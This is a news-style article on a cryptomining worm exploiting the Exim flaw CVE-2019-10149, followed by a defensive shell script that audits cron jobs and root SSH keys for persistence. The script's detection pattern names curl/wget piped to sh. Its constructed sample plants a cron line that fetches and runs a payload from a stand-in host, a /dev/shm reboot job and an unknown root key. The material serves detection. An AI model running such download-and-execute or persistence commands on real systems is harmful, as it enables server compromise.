Major Cyber-Attack Targets Millions of Linux Email Servers
A recent cyber-attack campaign has been identified by researchers, focusing on millions of Linux email servers worldwide. This attack involves a cryptomining malware payload that poses a significant threat to the security of these servers.
Exim Vulnerability Puts Millions of Servers at Risk
The target of this cyber-attack is Exim, a popular email server software that accounts for over half (57%) of the internet’s email servers. A vulnerability known as CVE-2019-10149 was discovered last week, putting more than 3.5 million servers at risk of exploitation by malicious actors.
Sophisticated Attack Strategy
Researchers have identified two waves of attack in this campaign. In the first wave, the attackers exploited the vulnerability from a command-and-control server hosted on the clear web. The second wave, however, appears to be more sophisticated in nature.
According to security vendor Cybereason, the attackers are using a highly pervasive campaign that installs cron jobs for persistence and downloads multiple payloads for various stages of the attack. One of the payloads includes a port scanner written in Python, which scans for additional vulnerable servers on the internet and infects them with the initial script.
Root Access Compromise
One alarming aspect of this cyber-attack is the attackers’ ability to add an RSA authentication key to the SSH server, allowing them to connect to the server as root and gain complete control over it. This level of access poses a serious threat to the security and integrity of the affected servers.
Urgent Patching and Remediation
System administrators are strongly advised to patch their Exim servers immediately and remove any suspicious cron jobs. With worm-like capabilities at play, swift action is necessary to prevent further damage and ensure the protection of these vulnerable servers.
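The two persistence mechanisms described above, cron jobs that fetch and run payloads and a key added to root's SSH authorized keys, are the things an administrator should look for after patching. The following is an added example, not code from the article or from Cybereason's report: a small POSIX shell audit that reports cron entries matching a download-and-execute or temp-directory pattern, and authorized_keys entries not present on a baseline of approved keys. The "suspicious" cron patterns, the cron file locations, and the idea of an administrator-maintained key baseline are assumptions of this example; the sample filesystem it builds is constructed, not real telemetry.

```shell
#!/bin/sh
# Added example, not code from the article or from Cybereason's report.
# Offline audit for the two persistence mechanisms described above:
#   1. cron jobs that fetch and execute remote content (or run from temp dirs)
#   2. SSH keys in an authorized_keys file that are not on a known-good baseline
# ROOT lets every check run against a staged copy of a filesystem; "/" audits the live host.

# What counts as a suspicious cron command here is an assumption of this example,
# not an indicator list from the report: a fetch tool piped straight into a shell,
# or a job that executes from a world-writable temp directory.
SUSPICIOUS_CRON_RE='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|/(tmp|dev/shm)/'

# Print each non-comment cron line under ROOT that matches SUSPICIOUS_CRON_RE,
# prefixed with the file it came from. Covers the system crontab, /etc/cron.d,
# and both common per-user spool layouts.
audit_cron() {
    root="${1:-/}"
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
        [ -f "$f" ] || continue
        grep -Ev '^[[:space:]]*(#|$)' "$f" | grep -E "$SUSPICIOUS_CRON_RE" | sed "s|^|$f: |"
    done
}

# Number of suspicious cron lines under ROOT (handy for a monitoring check).
count_suspicious_cron() {
    audit_cron "$1" | wc -l | tr -d ' '
}

# Reduce an authorized_keys line to "keytype base64blob", dropping any options
# prefix (e.g. no-pty, command="...") and the trailing comment, so a known key
# is still recognised if it is re-added with different options.
key_material() {
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-|sk-)/) { print $i, $(i+1); exit } }'
}

# Print every key in KEYS_FILE whose material is absent from BASELINE, a file of
# administrator-approved public keys (maintaining such a baseline is assumed here).
audit_authorized_keys() {
    keys="$1"; baseline="$2"
    [ -f "$keys" ] || return 0
    grep -Ev '^[[:space:]]*(#|$)' "$keys" | while IFS= read -r line; do
        material=$(printf '%s\n' "$line" | key_material)
        [ -n "$material" ] || continue
        if ! grep -qF -- "$material" "$baseline" 2>/dev/null; then
            printf '%s\n' "$line"
        fi
    done
}

# Build a constructed sample filesystem in a temp dir (not real telemetry): a benign
# system crontab, a downloader job in cron.d, a root crontab running from /dev/shm,
# and a root authorized_keys holding one approved key plus one unknown key.
# Prints the directory so callers can audit it and remove it afterwards.
build_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.d" "$d/var/spool/cron/crontabs" "$d/root/.ssh"
    cat > "$d/etc/crontab" <<'EOF'
# m h dom mon dow user  command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
EOF
    cat > "$d/etc/cron.d/update" <<'EOF'
*/10 * * * * root curl -fsSL http://placeholder.invalid/payload | sh
EOF
    cat > "$d/var/spool/cron/crontabs/root" <<'EOF'
@reboot /dev/shm/.x/run
EOF
    approved='ssh-ed25519 AAAAC3EXAMPLEAPPROVEDKEY0000000000000000000000000000000000000000 admin@placeholder.invalid'
    printf '%s\n' "$approved" > "$d/known_keys"
    printf '%s\n' "$approved" > "$d/root/.ssh/authorized_keys"
    printf 'no-pty ssh-rsa AAAAB3EXAMPLEUNKNOWNKEY000000000000000000000000000000000000000000 root@unknown\n' \
        >> "$d/root/.ssh/authorized_keys"
    printf '%s\n' "$d"
}

# `sh exim_audit.sh --demo` runs both audits against the constructed sample.
if [ "${1:-}" = "--demo" ]; then
    root=$(build_sample_root)
    echo "== suspicious cron entries =="; audit_cron "$root"
    echo "== root SSH keys not on the baseline =="
    audit_authorized_keys "$root/root/.ssh/authorized_keys" "$root/known_keys"
    rm -rf "$root"
fi
```

On a live host the same functions are called as root with `audit_cron /` and `audit_authorized_keys /root/.ssh/authorized_keys <baseline-file>`; anything they print is a candidate for the manual review and removal the advice above calls for, since a regex match is a lead rather than a verdict. Pointing ROOT at a mounted forensic image instead of `/` keeps the check from running on a possibly compromised live system.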
Hidden Intentions and Revenue Generation
The attackers behind this campaign have taken elaborate measures to conceal their intentions, utilizing hidden services on the Tor network and deceptive Windows icon files to evade detection. The prevalence of vulnerable Exim servers provides attackers with the opportunity to compromise numerous servers quickly and generate revenue through cryptocurrency mining.
Overall, the discovery of this cyber-attack highlights the importance of proactive security measures and vigilance in safeguarding critical infrastructure against evolving threats in the digital landscape.